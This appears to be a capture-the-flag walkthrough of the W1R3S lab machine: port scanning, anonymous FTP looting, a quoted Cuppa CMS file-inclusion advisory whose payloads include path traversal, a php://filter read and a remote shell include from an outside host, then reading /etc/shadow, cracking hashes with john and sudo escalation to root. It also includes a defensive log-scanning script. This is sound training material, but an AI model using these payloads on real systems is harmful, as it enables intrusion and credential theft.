Information Gathering

  • Kali and the target box are on the same subnet, so the target's IP address can be found directly:
root at kali in ~
$ nmap -sn --min-rate 10000 192.168.92.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-01 23:18 CST
Nmap scan report for 192.168.92.1
Host is up (0.00029s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.92.2
Host is up (0.00014s latency).
MAC Address: 00:50:56:F3:1F:1F (VMware)
Nmap scan report for 192.168.92.173
MAC Address: 00:0C:29:AA:7F:FC (VMware)
Nmap scan report for 192.168.92.254
Host is up (0.00014s latency).
MAC Address: 00:50:56:FF:22:F3 (VMware)
Nmap scan report for 192.168.92.170
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 11.38 seconds
  • Scan for open ports:
root at kali in ~ 
$ nmap -p- --min-rate 10000 192.168.92.173
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-01 23:20 CST
Nmap scan report for 192.168.92.173
Host is up (0.00018s latency).
Not shown: 55528 filtered tcp ports (no-response), 10003 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
MAC Address: 00:0C:29:AA:7F:FC (VMware)

Nmap done: 1 IP address (1 host up) scanned in 19.97 seconds
  • Identify the services behind the open ports:
root at kali in ~ 
$ nmap -p21,22,80,3306 -sT -sV -O 192.168.92.173
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-01 23:22 CST
Nmap scan report for 192.168.92.173
Host is up (0.00047s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:AA:7F:FC (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5.1
OS details: Linux 3.2 - 4.9, Linux 5.1
Network Distance: 1 hop
Service Info: Host: W1R3S.inc; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.14 seconds
  • Run the vuln scripts against those services:
root at kali in ~
$ nmap --script=vuln -p21,22,80,3306 --min-rate 10000 192.168.92.173
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-02 19:46 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Host is up (0.00059s latency).

PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
|_ /wordpress/wp-login.php: Wordpress login page.
3306/tcp open mysql
MAC Address: 00:0C:29:AA:7F:FC (VMware)

Nmap done: 1 IP address (1 host up) scanned in 353.19 seconds
  • Analyse the scan results:
# Ports 21, 22, 80 and 3306 are open

21 - FTP - anonymous login, weak passwords, brute force
22 - SSH - weak passwords, brute force
80 - Web - many possible vulnerability classes
3306 - MySQL - weak passwords, brute force
  • From experience, FTP is simpler to exploit than a web service, so try it first.

FTP Anonymous Login

  • Open the MSF framework and scan for anonymous FTP login:
msf6 > search auxiliary/scanner/ftp

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/ftp/anonymous normal No Anonymous FTP Access Detection
1 auxiliary/scanner/ftp/bison_ftp_traversal 2015-09-28 normal Yes BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure
2 auxiliary/scanner/ftp/colorado_ftp_traversal 2016-08-11 normal Yes ColoradoFTP Server 1.3 Build 8 Directory Traversal Information Disclosure
3 auxiliary/scanner/ftp/easy_file_sharing_ftp 2017-03-07 normal Yes Easy File Sharing FTP Server 3.6 Directory Traversal
4 auxiliary/scanner/ftp/ftp_login normal No FTP Authentication Scanner
5 auxiliary/scanner/ftp/ftp_version normal No FTP Version Scanner
6 auxiliary/scanner/ftp/konica_ftp_traversal 2015-09-22 normal Yes Konica Minolta FTP Utility 1.00 Directory Traversal Information Disclosure
7 auxiliary/scanner/ftp/pcman_ftp_traversal 2015-09-28 normal Yes PCMan FTP Server 2.0.7 Directory Traversal Information Disclosure
8 auxiliary/scanner/ftp/titanftp_xcrc_traversal 2010-06-15 normal No Titan FTP XCRC Directory Traversal Information Disclosure

Interact with a module by name or index. For example info 8, use 8 or use auxiliary/scanner/ftp/titanftp_xcrc_traversal

msf6 > use 0
msf6 auxiliary(scanner/ftp/anonymous) > show options

Module options (auxiliary/scanner/ftp/anonymous):

Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS mozilla@example.com no The password for the specified username
FTPUSER anonymous no The username to authenticate as
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 21 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/ftp/anonymous) > set RHOSTS 192.168.92.173
RHOSTS => 192.168.92.173
msf6 auxiliary(scanner/ftp/anonymous) > run

[+] 192.168.92.173:21 - 192.168.92.173:21 - Anonymous READ (220 Welcome to W1R3S.inc FTP service.)
[*] 192.168.92.173:21 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
  • Anonymous FTP login is enabled, but it is READ-only, so files cannot be uploaded. Log in (as anonymous):
root at kali in ~
$ ftp 192.168.92.173
Connected to 192.168.92.173.
220 Welcome to W1R3S.inc FTP service.
Name (192.168.92.173:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
  • Check whether any files exist and download them if so:
ftp> ls
229 Entering Extended Passive Mode (|||46843|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 content
drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 docs
drwxr-xr-x 2 ftp ftp 4096 Jan 28 2018 new-employees
226 Directory send OK.

ftp> cd content
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||42594|)
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 29 Jan 23 2018 01.txt
-rw-r--r-- 1 ftp ftp 165 Jan 23 2018 02.txt
-rw-r--r-- 1 ftp ftp 582 Jan 23 2018 03.txt
226 Directory send OK.
ftp> mget *
mget 01.txt [anpqy?]?
229 Entering Extended Passive Mode (|||43127|)
150 Opening BINARY mode data connection for 01.txt (29 bytes).
100% |*************************************************| 29 277.64 KiB/s 00:00 ETA
226 Transfer complete.
29 bytes received in 00:00 (32.25 KiB/s)
mget 02.txt [anpqy?]?
229 Entering Extended Passive Mode (|||43233|)
150 Opening BINARY mode data connection for 02.txt (165 bytes).
100% |*************************************************| 165 735.76 KiB/s 00:00 ETA
226 Transfer complete.
165 bytes received in 00:00 (130.36 KiB/s)
mget 03.txt [anpqy?]?
229 Entering Extended Passive Mode (|||47508|)
150 Opening BINARY mode data connection for 03.txt (582 bytes).
100% |*************************************************| 582 5.09 MiB/s 00:00 ETA
226 Transfer complete.
582 bytes received in 00:00 (776.44 KiB/s)
ftp> cd docs
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||46369|)
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 138 Jan 23 2018 worktodo.txt
226 Directory send OK.
ftp> mget *
mget worktodo.txt [anpqy?]?
229 Entering Extended Passive Mode (|||46797|)
150 Opening BINARY mode data connection for worktodo.txt (138 bytes).
100% |*************************************************| 138 175.24 KiB/s 00:00 ETA
226 Transfer complete.
138 bytes received in 00:00 (92.24 KiB/s)

ftp> cd new-employees
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||42198|)
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 155 Jan 28 2018 employee-names.txt
226 Directory send OK.
ftp> mget *
mget employee-names.txt [anpqy?]?
229 Entering Extended Passive Mode (|||48121|)
150 Opening BINARY mode data connection for employee-names.txt (155 bytes).
100% |*************************************************| 155 158.49 KiB/s 00:00 ETA
226 Transfer complete.
155 bytes received in 00:00 (82.62 KiB/s)
  • Five files were downloaded; look at each in turn:
root at kali in ~ 
$ ll *.txt
-rw-r--r-- 1 root root 29 2018年 1月23日 01.txt
-rw-r--r-- 1 root root 165 2018年 1月23日 02.txt
-rw-r--r-- 1 root root 582 2018年 1月23日 03.txt
-rw-r--r-- 1 root root 155 2018年 1月29日 employee-names.txt
-rw-r--r-- 1 root root 138 2018年 1月23日 worktodo.txt

root at kali in ~
$ cat 01.txt
New FTP Server For W1R3S.inc

root at kali in ~
$ cat 02.txt
#
#
#
#
#
#
#
#
01ec2d8fc11c493b25029fb1f47f39ce
#
#
#
#
#
#
#
#
#
#
#
#
#
SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==
############################################

root at kali in ~
$ cat 03.txt
___________.__ __ __ ______________________ _________ .__
\__ ___/| |__ ____ / \ / \/_ \______ \_____ \ / _____/ |__| ____ ____
| | | | \_/ __ \ \ \/\/ / | || _/ _(__ < \_____ \ | |/ \_/ ___\
| | | Y \ ___/ \ / | || | \/ \/ \ | | | \ \___
|____| |___| /\___ > \__/\ / |___||____|_ /______ /_______ / /\ |__|___| /\___ >
\/ \/ \/ \/ \/ \/ \/ \/ \/

root at kali in ~
$ cat employee-names.txt
The W1R3S.inc employee list

Naomi.W - Manager
Hector.A - IT Dept
Joseph.G - Web Design
Albert.O - Web Design
Gina.L - Inventory
Rico.D - Human Resources

root at kali in ~
$ cat worktodo.txt
ı pou,ʇ ʇɥıuʞ ʇɥıs ıs ʇɥǝ ʍɐʎ ʇo ɹooʇ¡

....punoɹɐ ƃuıʎɐןd doʇs ‘op oʇ ʞɹoʍ ɟo ʇoן ɐ ǝʌɐɥ ǝʍ
  • After going through the five files:
    • 01 and 03 contain nothing useful
    • 02 seems to contain two encoded strings
    • employee-names looks like an account/credential file
    • worktodo looks like English text turned upside down
  • Take them one at a time; first identify the encoding type:
root at kali in ~
$ hash-identifier 01ec2d8fc11c493b25029fb1f47f39ce
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4

root at kali in ~
$ hash-identifier 'SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg=='
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------

Not Found.
--------------------------------------------------
  • The first string is identified as MD5. The second is not a hash, but the two trailing = signs suggest base64, so try decoding it:
root at kali in ~ 
$ echo 'SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==' | base64 -d
It is easy, but not that easy..
  • Obviously just filler; try looking up the MD5 hash:

[screenshot]

i don't think this is the way to root!
we have a ןot of work to do‘ stop pןaying around˙˙˙˙
  • Nothing useful either.
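The two decoding steps above (02.txt and worktodo.txt) can be scripted. The Python below is an added example, not part of the original write-up; the file contents are quoted from the listings above, and note that line 2 of worktodo.txt is also written right-to-left while line 1 is not, which the decoder handles by scoring both reading directions.

```python
import base64
import re

# Upside-down glyph -> upright character, covering the glyphs seen in worktodo.txt
# plus the rest of the usual flipped alphabet. Pairs like p/d, b/q and u/n swap.
UPRIGHT = {
    "ɐ": "a", "q": "b", "ɔ": "c", "p": "d", "ǝ": "e", "ɟ": "f", "ƃ": "g",
    "ɥ": "h", "ı": "i", "ɾ": "j", "ʞ": "k", "ן": "l", "ɯ": "m", "u": "n",
    "o": "o", "d": "p", "b": "q", "ɹ": "r", "s": "s", "ʇ": "t", "n": "u",
    "ʌ": "v", "ʍ": "w", "x": "x", "ʎ": "y", "z": "z",
    "¡": "!", "¿": "?", ",": "'", "'": ",", "‘": ",", "˙": ".", ".": ".",
}

# A few very common words, used only to decide which reading direction is English.
COMMON = {"i", "a", "is", "the", "to", "we", "of", "do", "this", "and", "it"}

# File contents as downloaded from the FTP share (quoted from the write-up above;
# the '#' padding of 02.txt is reconstructed to the same layout).
WORKTODO = """ı pou,ʇ ʇɥıuʞ ʇɥıs ıs ʇɥǝ ʍɐʎ ʇo ɹooʇ¡

....punoɹɐ ƃuıʎɐןd doʇs ‘op oʇ ʞɹoʍ ɟo ʇoן ɐ ǝʌɐɥ ǝʍ
"""
CONTENT_02 = (
    "#\n" * 8 + "01ec2d8fc11c493b25029fb1f47f39ce\n" + "#\n" * 13
    + "SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==\n" + "#" * 44 + "\n"
)


def unflip(line: str) -> str:
    """Map every upside-down glyph to its upright form; unknown characters pass through."""
    return "".join(UPRIGHT.get(ch, ch) for ch in line)


def english_score(text: str) -> int:
    """Count common English words; higher means the text reads as English."""
    return sum(1 for w in re.findall(r"[a-z']+", text.lower()) if w in COMMON)


def decode_flipped(line: str) -> str:
    """Rotated text is sometimes also written right-to-left, so keep whichever
    reading direction scores higher as English."""
    forward, backward = unflip(line), unflip(line[::-1])
    return backward if english_score(backward) > english_score(forward) else forward


def decode_worktodo(text: str) -> list:
    return [decode_flipped(line) for line in text.splitlines() if line.strip()]


def classify_token(token: str) -> str:
    """Classify one non-comment line of 02.txt, mirroring hash-identifier and base64 -d."""
    if re.fullmatch(r"[0-9a-fA-F]{32}", token):
        return "32 hex chars: MD5-sized digest (MD4/NTLM have the same length)"
    try:
        decoded = base64.b64decode(token, validate=True).decode("ascii")
        if decoded.isprintable():
            return "base64 text: " + decoded
    except (ValueError, UnicodeDecodeError):
        pass
    return "unknown"


def decode_02(text: str) -> list:
    """Skip the '#' padding lines and classify what is left."""
    tokens = [ln.strip() for ln in text.splitlines() if ln.strip() and not ln.startswith("#")]
    return [classify_token(t) for t in tokens]


if __name__ == "__main__":
    print(decode_02(CONTENT_02))
    print(decode_worktodo(WORKTODO))
```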

Directory Scanning

  • Visit the web service:

[screenshot]

  • A familiar landing page, which immediately says directory scanning is needed; run dirsearch:
root at kali in ~         
$ dirsearch -u 'http://192.168.92.173'
/root/.dirsearch/reports/192.168.92.173/_23-07-02_19-06-00.txt

[screenshot]

  • Several directories were found; visit them:

[screenshots]

  • There is a Cuppa CMS and a WordPress install that cannot be reached.

Cuppa CMS

  • Search for vulnerabilities in this CMS:
root at kali in ~ 
$ searchsploit -t cuppa
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion | php/webapps/25971.txt
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
  • There is indeed a file inclusion vulnerability; copy the entry to the current directory and read it:
root at kali in ~
$ searchsploit -m 25971.txt
Exploit: Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion
URL: https://www.exploit-db.com/exploits/25971
Path: /usr/share/exploitdb/exploits/php/webapps/25971.txt
Codes: OSVDB-94101
Verified: True
File Type: C++ source, ASCII text, with very long lines (876)
Copied to: /root/25971.txt
root at kali in ~
$ cat 25971.txt
# Exploit Title : Cuppa CMS File Inclusion
# Date : 4 June 2013
# Exploit Author : CWH Underground
# Site : www.2600.in.th
# Vendor Homepage : http://www.cuppacms.com/
# Software Link : http://jaist.dl.sourceforge.net/project/cuppacms/cuppa_cms.zip
# Version : Beta
# Tested on : Window and Linux

,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'

####################################
VULNERABILITY: PHP CODE INJECTION
####################################

/alerts/alertConfigField.php (LINE: 22)

-----------------------------------------------------------------------------
LINE 22:
<?php include($_REQUEST["urlConfig"]); ?>
-----------------------------------------------------------------------------


#####################################################
DESCRIPTION
#####################################################

An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the fil
e name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vul
nerability can lead to full server compromise.

http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]

#####################################################
EXPLOIT
#####################################################

http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

Moreover, We could access Configuration.php source code via PHPStream

For Example:
-----------------------------------------------------------------------------
http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
-----------------------------------------------------------------------------

Base64 Encode Output:
-----------------------------------------------------------------------------
PD9waHAgCgljbGFzcyBDb25maWd1cmF0aW9uewoJCXB1YmxpYyAkaG9zdCA9ICJsb2NhbGhvc3QiOwoJCXB1YmxpYyAkZGIgPSAiY3VwcGEiOwoJCXB1YmxpYyAkdXNlciA9ICJyb290IjsKCQ
lwdWJsaWMgJHBhc3N3b3JkID0gIkRiQGRtaW4iOwoJCXB1YmxpYyAkdGFibGVfcHJlZml4ID0gImN1XyI7CgkJcHVibGljICRhZG1pbmlzdHJhdG9yX3RlbXBsYXRlID0gImRlZmF1bHQiOwoJ
CXB1YmxpYyAkbGlzdF9saW1pdCA9IDI1OwoJCXB1YmxpYyAkdG9rZW4gPSAiT0JxSVBxbEZXZjNYIjsKCQlwdWJsaWMgJGFsbG93ZWRfZXh0ZW5zaW9ucyA9ICIqLmJtcDsgKi5jc3Y7ICouZG
9jOyAqLmdpZjsgKi5pY287ICouanBnOyAqLmpwZWc7ICoub2RnOyAqLm9kcDsgKi5vZHM7ICoub2R0OyAqLnBkZjsgKi5wbmc7ICoucHB0OyAqLnN3ZjsgKi50eHQ7ICoueGNmOyAqLnhsczsg
Ki5kb2N4OyAqLnhsc3giOwoJCXB1YmxpYyAkdXBsb2FkX2RlZmF1bHRfcGF0aCA9ICJtZWRpYS91cGxvYWRzRmlsZXMiOwoJCXB1YmxpYyAkbWF4aW11bV9maWxlX3NpemUgPSAiNTI0Mjg4MC
I7CgkJcHVibGljICRzZWN1cmVfbG9naW4gPSAwOwoJCXB1YmxpYyAkc2VjdXJlX2xvZ2luX3ZhbHVlID0gIiI7CgkJcHVibGljICRzZWN1cmVfbG9naW5fcmVkaXJlY3QgPSAiIjsKCX0gCj8+
-----------------------------------------------------------------------------

Base64 Decode Output:
-----------------------------------------------------------------------------
<?php
class Configuration{
public $host = "localhost";
public $db = "cuppa";
public $user = "root";
public $password = "Db@dmin";
public $table_prefix = "cu_";
public $administrator_template = "default";
public $list_limit = 25;
public $token = "OBqIPqlFWf3X";
public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *
.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
public $upload_default_path = "media/uploadsFiles";
public $maximum_file_size = "5242880";
public $secure_login = 0;
public $secure_login_value = "";
public $secure_login_redirect = "";
}
?>
-----------------------------------------------------------------------------

Able to read sensitive information via File Inclusion (PHP Stream)

################################################################################################################
Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################
  • Try it:
http://192.168.92.173/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

[screenshot]

  • Nothing is displayed, but the advisory above shows the vulnerable line is:
<?php include($_REQUEST["urlConfig"]); ?>
  • Try sending it as POST instead ($_REQUEST accepts POST parameters as well):

[screenshot]
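From the defender's side, the GET-versus-POST behaviour just observed matters for detection: Apache's access log records the query string of a GET but never a POST body. The Python below is an added example, not code from the write-up or from Cuppa CMS; it runs over constructed sample log lines, flags traversal and wrapper indicators in the urlConfig parameter the advisory names, and separately surfaces POSTs to the script because their parameters are invisible in the access log.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in Apache "combined" format (not real logs from the box).
# Line 2 is a POST: its body, where the urlConfig parameter travelled, is not logged.
SAMPLE_LOG = """\
192.168.92.170 - - [02/Jul/2023:19:10:01 +0800] "GET /administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd HTTP/1.1" 200 312 "-" "Mozilla/5.0"
192.168.92.170 - - [02/Jul/2023:19:10:07 +0800] "POST /administrator/alerts/alertConfigField.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.168.92.170 - - [02/Jul/2023:19:10:09 +0800] "GET /administrator/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php HTTP/1.1" 200 1800 "-" "Mozilla/5.0"
192.168.92.170 - - [02/Jul/2023:19:10:12 +0800] "GET /administrator/alerts/alertConfigField.php?urlConfig=%2e%2e%2f%2e%2e%2fetc%2fshadow HTTP/1.1" 200 900 "-" "Mozilla/5.0"
10.0.0.5 - - [02/Jul/2023:19:11:00 +0800] "GET /wordpress/wp-login.php HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Parameter the advisory names as being passed straight to include().
INCLUDE_PARAMS = {"urlConfig"}
VULN_SCRIPT = "/alerts/alertConfigField.php"


def inclusion_indicators(value: str) -> list:
    """Return the reasons a parameter value looks like a file-inclusion attempt."""
    v = unquote(unquote(value))  # tolerate double URL-encoding
    reasons = []
    if "../" in v or "..\\" in v:
        reasons.append("path traversal")
    m = re.match(r"^([a-z][a-z0-9+.-]*)://", v, re.I)
    if m:
        scheme = m.group(1).lower()
        reasons.append("php wrapper" if scheme == "php" else "remote include (%s)" % scheme)
    return reasons


def scan_log(text: str) -> list:
    """Return (ip, method, path, reason) tuples for suspicious requests."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        params = parse_qs(url.query, keep_blank_values=True)
        for name in INCLUDE_PARAMS:
            for value in params.get(name, []):
                for why in inclusion_indicators(value):
                    alerts.append((m["ip"], m["method"], url.path, why))
        # $_REQUEST also reads the POST body, which the access log never records:
        # surface POSTs to the script so they can be checked in a proxy/WAF capture.
        if m["method"] == "POST" and url.path.endswith(VULN_SCRIPT):
            alerts.append((m["ip"], "POST", url.path, "body not logged; check proxy/WAF capture"))
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(*alert)
```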

  • That returns the file, so the vulnerability is real; read /etc/shadow to crack the passwords:

[screenshot]

  • The result:
root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
daemon:*:17379:0:99999:7:::
......
proxy:*:17379:0:99999:7:::
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
backup:*:17379:0:99999:7:::
.......
saned:*:17379:0:99999:7:::
usbmux:*:17379:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
......
  • Save the hashes to a file and crack them with john:
root at kali in ~ 
$ john md5
Created directory: /root/.john
Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA256"
Use the "--format=HMAC-SHA256" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
www-data (www-data)
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
computer (w1r3s)
  • Credentials found; try logging in:
root at kali in ~ 
$ ssh w1r3s@192.168.92.173
The authenticity of host '192.168.92.173 (192.168.92.173)' can't be established.
ED25519 key fingerprint is SHA256:Bue5VbUKeMSJMQdicmcMPTCv6xvD7I+20Ki8Um8gcWM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.92.173' (ED25519) to the list of known hosts.
----------------------
Think this is the way?
----------------------
Well,........possibly.
----------------------
w1r3s@192.168.92.173's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.13.0-36-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

641 packages can be updated.
490 updates are security updates.

New release '18.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

.....You made it huh?....
Last login: Mon Jan 22 22:47:27 2018 from 192.168.0.35
w1r3s@W1R3S:~$ id
uid=1000(w1r3s) gid=1000(w1r3s) groups=1000(w1r3s),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
  • Login successful!

SUDO Privilege Escalation

  • Check which commands the current account may run:
w1r3s@W1R3S:~$ sudo -l
[sudo] password for w1r3s:
Matching Defaults entries for w1r3s on W1R3S.localdomain:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User w1r3s may run the following commands on W1R3S.localdomain:
(ALL : ALL) ALL
  • Triple-ALL rights ((ALL : ALL) ALL), so just running bash through sudo gives root:
w1r3s@W1R3S:~$ sudo /bin/bash
root@W1R3S:~# id
uid=0(root) gid=0(root) groups=0(root)
root@W1R3S:~# cd /root
root@W1R3S:/root# ls
flag.txt
root@W1R3S:/root# cat flag.txt
-----------------------------------------------------------------------------------------
____ ___ _ _ ____ ____ _ _____ _ _ _ _ _____ ___ ___ _ _ ____
/ ___/ _ \| \ | |/ ___| _ \ / \|_ _| | | | | / \|_ _|_ _/ _ \| \ | / ___|
| | | | | | \| | | _| |_) | / _ \ | | | | | | | / _ \ | | | | | | | \| \___ \
| |__| |_| | |\ | |_| | _ < / ___ \| | | |_| | |___ / ___ \| | | | |_| | |\ |___) |
\____\___/|_| \_|\____|_| \_\/_/ \_\_| \___/|_____/_/ \_\_| |___\___/|_| \_|____/

-----------------------------------------------------------------------------------------

.-----------------TTTT_-----_______
/''''''''''(______O] ----------____ \______/]_
__...---'"""\_ --'' Q ___________@
|''' ._ _______________=---------"""""""
| ..--''| l L |_l |
| ..--'' . /-___j ' '
| ..--'' / , ' '
|--'' / ` \
L__' \ -
- '-.
'. /
'-./

----------------------------------------------------------------------------------------
YOU HAVE COMPLETED THE
__ __ ______________________ _________
/ \ / \/_ \______ \_____ \ / _____/
\ \/\/ / | || _/ _(__ < \_____ \
\ / | || | \/ \/ \
\__/\ / |___||____|_ /______ /_______ /.INC
\/ \/ \/ \/ CHALLENGE, V 1.0
----------------------------------------------------------------------------------------

CREATED BY SpecterWires

----------------------------------------------------------------------------------------

Additional Notes

